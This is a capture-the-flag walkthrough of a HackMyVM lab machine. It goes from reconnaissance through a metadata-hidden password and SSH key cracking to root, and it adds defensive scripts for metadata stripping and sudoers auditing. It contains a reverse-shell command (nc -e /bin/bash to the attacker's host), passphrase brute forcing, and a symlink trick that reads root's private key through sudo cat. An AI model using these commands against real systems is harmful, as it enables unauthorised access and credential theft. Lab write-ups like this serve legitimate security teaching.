HackMyVM target series (3) - visions
2022-07-06 13:57:00 【The moon should know my meaning】
1. Information gathering
First probe the network segment to find the target host:
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Then run a full port scan; it finds an SSH service and an HTTP service:
nmap -sC -sV -p- 192.168.200.234
Visiting the HTTP service, I found only one picture and an HTML comment.
The comment looks like a hint; aliccia might be a username.
Scan for directories with dirsearch to see what turns up:
dirsearch -u http://192.168.200.234/ -e php,html,txt,bak,zip,7z,gz,db -x 404,301,500,502
Nothing useful turns up, however.
Following the hint, download the picture and check its metadata:
curl http://192.168.200.234/white.png -o white.png
./exiftool white.png
As shown, the password is in the image metadata.
Tool usage and download:
ExifTool Complete introduction guide
alicia:ihaveadream
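The credential above sits in a text chunk of the PNG, which is exactly the kind of field exiftool lists. The following added example (mine, not from the writeup) parses the tEXt, zTXt and iTXt chunks of a PNG directly, so a publishing pipeline can detect leftover metadata and strip it before an image lands on a web root. The sample image is constructed inline; the target's white.png is not used, and the embedded text is a placeholder, not a real secret.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def _chunk(ctype, payload):
    """Serialize one chunk: big-endian length, type, payload, CRC over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def iter_chunks(data):
    """Yield (type, payload) for every chunk, checking the signature, lengths and CRCs."""
    if data[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        if pos + 12 + length > len(data):
            raise ValueError("truncated chunk")
        ctype = data[pos + 4:pos + 8]
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            break


def decode_text_chunk(ctype, payload):
    """Return (keyword, text) for the three PNG text chunk types."""
    keyword, _, rest = payload.partition(b"\x00")
    if ctype == b"tEXt":              # keyword \0 latin-1 text
        return keyword.decode("latin-1"), rest.decode("latin-1")
    if ctype == b"zTXt":              # keyword \0 method(1) zlib-compressed latin-1 text
        return keyword.decode("latin-1"), zlib.decompress(rest[1:]).decode("latin-1")
    if ctype == b"iTXt":              # keyword \0 flag(1) method(1) lang \0 translated \0 utf-8 text
        compressed = rest[0]
        _lang, _, rest = rest[2:].partition(b"\x00")
        _translated, _, text = rest.partition(b"\x00")
        if compressed:
            text = zlib.decompress(text)
        return keyword.decode("latin-1"), text.decode("utf-8")
    raise ValueError(f"{ctype!r} is not a text chunk")


def extract_text(data):
    """All (keyword, text) pairs an exiftool-style listing would show for this PNG."""
    return [decode_text_chunk(t, p) for t, p in iter_chunks(data) if t in TEXT_CHUNKS]


def strip_text_chunks(data):
    """Rebuild the PNG without its text chunks; pixel data and CRCs are preserved."""
    out = bytearray(PNG_SIGNATURE)
    for ctype, payload in iter_chunks(data):
        if ctype not in TEXT_CHUNKS:
            out += _chunk(ctype, payload)
    return bytes(out)


def build_sample_png():
    """Constructed 1x1 white RGB PNG carrying a tEXt and a zTXt chunk (sample data, not the target's image)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit depth, colour type 2 (RGB)
    idat = zlib.compress(b"\x00\xff\xff\xff")            # filter byte + one white pixel
    text = b"Comment\x00placeholder-credential"          # placeholder, not a real secret
    ztxt = b"Description\x00\x00" + zlib.compress(b"hidden note")
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", text)
            + _chunk(b"zTXt", ztxt) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


if __name__ == "__main__":
    sample = build_sample_png()
    for keyword, value in extract_text(sample):
        print(f"{keyword}: {value}")
    print("chunks after stripping:", [t for t, _ in iter_chunks(strip_text_chunks(sample))])
```

Running extract_text over every image in a web root before deployment catches comments like this one; strip_text_chunks removes them without re-encoding the pixels. Text chunks are only one carrier, though: eXIf chunks and data appended after IEND also survive a naive copy, so a real pipeline should whitelist the chunk types it keeps rather than blacklist these three.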
2. Exploitation
Login succeeds.
There was no flag in the current directory after logging in. Looking at the home directory I found four users, and in sophia's directory I found the flag, but I have no permission to read it.
So, try privilege escalation first?
sudo -l
The current user can run nc as user emma without a password.
In that case, try to get a reverse shell first.
Listen on a port on Kali, then run the following command on the target machine:
sudo -u emma nc 192.168.200.192 10000 -e /bin/bash
The shell comes back successfully; use Python to get an interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
There is a note.txt file in the current directory with the following contents.
I'm at a loss here; I don't know what it means.
Then I checked SUID binaries and sudo again for privilege escalation, but found no way forward.
Later I read another writeup and learned that an image-processing tool is needed.
After uploading the picture, click the arrow.
Then the username and password appear. In this box the information really is all hidden in the picture.
sophia:seemstobeimpossible
Login successful.
The current user can run the cat command as any user on the .invisible file. This means we can use cat to read that file with root privileges.
Opening it shows the private key of user isabella; use it to log in.
A passphrase is still required.
The only option is to brute force it.
John the Ripper can do this, but first convert id_rsa into a hash John recognizes with the following command:
python3 /usr/share/john/ssh2john.py id_rsa > crack.txt
I used a script to run the cracking here.
rockyou.txt is a wordlist that ships with Kali at /usr/share/wordlists/rockyou.txt.gz; it has to be decompressed before use, otherwise you will get garbage:
gzip -d rockyou.txt.gz
The passphrase is cracked successfully (it was more than ten thousand lines into the wordlist, but I moved it to the front while writing this writeup).
invisible
As shown, login successful.
From here on the IP changed, because I switched networks.
3. Privilege escalation
Check whether there are any commands that can be used to escalate privileges.
No breakthrough, however.
Then I suddenly remembered that the sophia user can run cat on the .invisible file with root privileges. Can I, as the isabella user, make .invisible a link to root's private key?
Create a symbolic link:
ln -sf /root/.ssh/id_rsa .invisible
Read root's private key:
sudo cat /home/isabella/.invisible
There is a small problem logging in with the private key: an overly permissive file mode causes login to fail.
Tighten the permissions and log in again:
chmod 600 key
Login successful; root privileges obtained.
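The escalation works because the sudo rule names a path inside a directory isabella owns, so .invisible can be replaced with a symlink and the privileged cat follows it. As an added example (mine, not part of this writeup), the script below audits sudoers-style rules for that shape and for the passwordless nc rule found earlier, then reproduces the swap in a temporary directory and contrasts a plain read with one that refuses to follow a symlink in the final path component. The sudoers lines and the files are constructed; the target's real /etc/sudoers is not shown in the writeup, so the exact rule syntax is an assumption.

```python
import errno
import os
import re
import stat
import tempfile

# Constructed sudoers lines modelled on the two rules found in the writeup.
# The real sudoers on the box is not shown, so the exact syntax is an assumption.
SAMPLE_SUDOERS = """\
root    ALL=(ALL:ALL) ALL
alicia  ALL=(emma) NOPASSWD: /usr/bin/nc
sophia  ALL=(ALL) NOPASSWD: /usr/bin/cat /home/isabella/.invisible
"""

# user  host=(runas[:group]) [TAG: ...] command [args]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$"
)

# Directories an unprivileged user can populate; a path argument under them can be swapped for a symlink.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


def parse_rules(text):
    """Parse simple user-specification lines; comments, blanks and Defaults are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append(m.groupdict())
    return rules


def audit(text):
    """Return (user, finding) pairs for the rule shapes that enabled the escalation above."""
    findings = []
    for r in parse_rules(text):
        if r["user"] == "root":
            continue
        if "NOPASSWD" in r["tags"]:
            findings.append((r["user"], "NOPASSWD"))
        if r["runas"].split(":")[0] in ("ALL", "root"):
            findings.append((r["user"], "runs-as-root"))
        for arg in r["cmd"].split()[1:]:          # arguments after the binary
            if arg.startswith(USER_WRITABLE_PREFIXES):
                findings.append((r["user"], f"user-writable-path:{arg}"))
    return findings


def read_without_following(path):
    """Read a file like `cat`, but refuse if the final path component is a symlink."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError as exc:
        if exc.errno == errno.ELOOP:              # Linux reports ELOOP when O_NOFOLLOW hits a symlink
            raise PermissionError(f"refusing to follow symlink: {path}") from exc
        raise
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError(f"not a regular file: {path}")
    except BaseException:
        os.close(fd)
        raise
    with os.fdopen(fd, "rb") as fh:
        return fh.read()


def demo_symlink_swap():
    """Reproduce the .invisible -> private key swap in a temp dir and compare both readers."""
    with tempfile.TemporaryDirectory() as home:
        secret = os.path.join(home, "root_id_rsa")       # stands in for root's key; constructed content
        with open(secret, "w") as fh:
            fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed-placeholder\n")
        link = os.path.join(home, ".invisible")
        os.symlink(secret, link)                           # what `ln -sf` did on the box
        with open(link) as fh:                             # follows the link, as `cat` does
            naive_leaks_key = fh.read().startswith("-----BEGIN")
        try:
            read_without_following(link)
            hardened = "read"
        except PermissionError:
            hardened = "refused"
        return naive_leaks_key, hardened


if __name__ == "__main__":
    for user, finding in audit(SAMPLE_SUDOERS):
        print(f"{user}: {finding}")
    print("naive read leaks key, hardened reader:", demo_symlink_swap())
```

O_NOFOLLOW only protects the last path component; a directory earlier in the path that the user owns can still be replaced, so the hardened reader is a second line of defence, not a fix. The real remediation is the audit finding itself: a sudo rule whose argument lives under a user-controlled directory grants whatever that user points the path at, and the rule should be removed or the file moved to a root-owned location.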